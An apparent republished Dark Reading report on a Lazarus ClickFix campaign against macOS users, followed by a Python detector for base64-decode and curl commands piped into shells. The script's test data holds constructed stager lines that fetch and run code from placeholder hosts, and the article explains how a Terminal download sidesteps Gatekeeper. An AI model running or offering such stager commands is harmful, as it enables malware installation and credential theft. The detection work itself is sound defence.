HackMyIP
2026-04-24 Dark Reading

North Korea's Lazarus Targets macOS Users via ClickFix

Tags: APT, Malware, Phishing

Lazarus, the state‑sponsored advanced persistent threat (APT) group linked to North Korea, has launched a new campaign that specifically targets macOS users in organizations that rely heavily on Apple infrastructure. The operation, documented by Dark Reading, begins with a spear‑phishing email sent to senior executives and IT administrators at a Mac‑centric research firm. The message masquerades as a routine software update notification from a trusted vendor, containing a link that leads to a compromised web page.

On the malicious site, visitors are presented with a fraudulent "Critical Update Required" dialog that employs the ClickFix technique: instead of exploiting a vulnerability, the page tells the user that something is broken and that the "fix" is to open the macOS Terminal and paste a one‑line command, so the victim runs the payload with their own privileges. The pasted command decodes a base64‑encoded string and executes the result, which downloads a Mach‑O binary signed with an abused Apple Developer ID. The signature lets the binary pass as trusted developer software; note that Gatekeeper only inspects files carrying the com.apple.quarantine attribute, which a curl download launched from Terminal never receives, so the user‑driven install path sidesteps Gatekeeper regardless of the signature. The binary is a variant of the AppleJeus malware family, internally tracked as MACLazarus, that establishes a reverse shell to an attacker‑controlled domain masquerading as an Apple iCloud support endpoint (e.g., apple‑icloud‑support.com).

Once on the victim’s machine, MACLazarus performs extensive reconnaissance, harvesting keychain entries, browser cookies from Safari and Chrome, SSH keys, and cryptocurrency wallet data stored in common locations such as ~/Library/Application Support/Electrum/. It also enumerates system information and exfiltrates the stolen artifacts over HTTPS to the C2 server. The malware leverages standard macOS APIs and legitimate system tools to blend in with normal activity, making detection challenging for traditional antivirus solutions.

Security teams are advised to train users never to paste commands from web pages into Terminal, to restrict Terminal and other shells through MDM profiles and TCC (Full Disk Access) permissions, and to monitor endpoint telemetry for shells that decode base64 and pipe the result into an interpreter. Deploying YARA rules that match the AppleJeus payload and blocking the identified C2 domains can help mitigate the threat. The campaign has been attributed to Lazarus (also known as Hidden Cobra) and continues the group's focus on high‑value targets through socially engineered ClickFix lures.
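The one‑liner described above (decode a base64 blob, run it, fetch and execute a binary) and the telemetry monitoring recommended here share one detection: flag any shell command that decodes base64 or fetches from the network and pipes the output into an interpreter, then decode the blob so the analyst can see the stager and its hosts. The script below is an added example, not code from Dark Reading or from the campaign; the telemetry lines, the stager string, the hostnames and the blocklist are all constructed placeholders. Real indicators from the report would replace BLOCKED_HOSTS.

```python
"""Flag ClickFix-style shell one-liners in process telemetry and show what they decode to."""
from __future__ import annotations

import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import Optional

# Hypothetical blocklist; replace with the C2 domains published in the vendor report.
BLOCKED_HOSTS = {"example.invalid"}

# macOS `base64` decodes with -D, GNU coreutils with -d/--decode; match all three.
DECODE_RE = re.compile(r"\bbase64\s+(?:-D|-d|--decode)\b")
# Output piped into an interpreter: `| sh`, `| /bin/bash`, `| sudo zsh`, `| python3`, `| osascript`.
PIPE_TO_INTERP_RE = re.compile(
    r"\|\s*(?:sudo\s+)?(?:/(?:usr/)?bin/)?(?:sh|bash|zsh|python3?|osascript)\b"
)
FETCH_RE = re.compile(r"\b(?:curl|wget)\b")
# A run of base64 alphabet long enough to hold a command, with optional padding.
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


@dataclass
class Finding:
    cmdline: str
    reasons: list[str] = field(default_factory=list)
    decoded: list[str] = field(default_factory=list)   # what the base64 blobs decode to
    hosts: set[str] = field(default_factory=set)       # hosts seen in cmdline or decoded text
    blocked: set[str] = field(default_factory=set)     # subset that hits the blocklist


def decode_base64_tokens(cmdline: str) -> list[str]:
    """Return every base64 token in the command line that decodes to readable text."""
    decoded = []
    for tok in B64_TOKEN_RE.findall(cmdline):
        try:
            text = base64.b64decode(tok, validate=True).decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # not real base64, or not text: ignore the token
        if all(c.isprintable() or c in "\n\t" for c in text):
            decoded.append(text)
    return decoded


def analyze(cmdline: str) -> Optional[Finding]:
    """Return a Finding when the command line matches a ClickFix-style pattern, else None."""
    f = Finding(cmdline=cmdline)
    piped = bool(PIPE_TO_INTERP_RE.search(cmdline))
    if DECODE_RE.search(cmdline) and piped:
        f.reasons.append("base64 decode piped into an interpreter")
    if FETCH_RE.search(cmdline) and piped:
        f.reasons.append("remote fetch piped into an interpreter")
    if not f.reasons:
        return None
    f.decoded = decode_base64_tokens(cmdline)
    for text in [cmdline, *f.decoded]:
        f.hosts.update(HOST_RE.findall(text))
    f.blocked = {
        h for h in f.hosts
        if h in BLOCKED_HOSTS or any(h.endswith("." + b) for b in BLOCKED_HOSTS)
    }
    return f


def scan(events: list[str]) -> list[Finding]:
    """Run analyze() over a list of process command lines and keep the hits."""
    return [f for f in (analyze(e) for e in events) if f is not None]


# Constructed stager in the shape the article describes (download a binary, mark it
# executable, run it). The path and hostname are placeholders, not real indicators.
STAGER = "curl -fsSL https://cdn.example.invalid/update -o /tmp/.upd; chmod +x /tmp/.upd; /tmp/.upd"
STAGER_B64 = base64.b64encode(STAGER.encode()).decode()

# Constructed process-telemetry sample: one command line per process launch.
SAMPLE_EVENTS = [
    "/bin/zsh -c 'ls -la ~/Library/Application Support'",            # benign
    f"/bin/zsh -c 'echo {STAGER_B64} | base64 -D | sh'",              # ClickFix paste
    "/bin/bash -c 'curl -fsSL https://get.example.invalid/install.sh | bash'",  # fetch-and-run
    "/usr/bin/base64 -D -i /tmp/report.b64 -o /tmp/report.pdf",       # decode without execution
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print("FLAGGED:", hit.cmdline)
        for r in hit.reasons:
            print("  reason :", r)
        for d in hit.decoded:
            print("  decodes:", d)
        print("  hosts  :", sorted(hit.hosts), "blocked:", sorted(hit.blocked))
```

The decode step matters more than the match itself: the analyst gets the stager's download URL and drop path without having to run anything, and the blocklist comparison turns the finding into a C2 hit when the host is already known. The negative case (base64 -D writing to a file, no pipe) is deliberately not flagged, since plain decoding is common in legitimate tooling.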

Source: Dark Reading

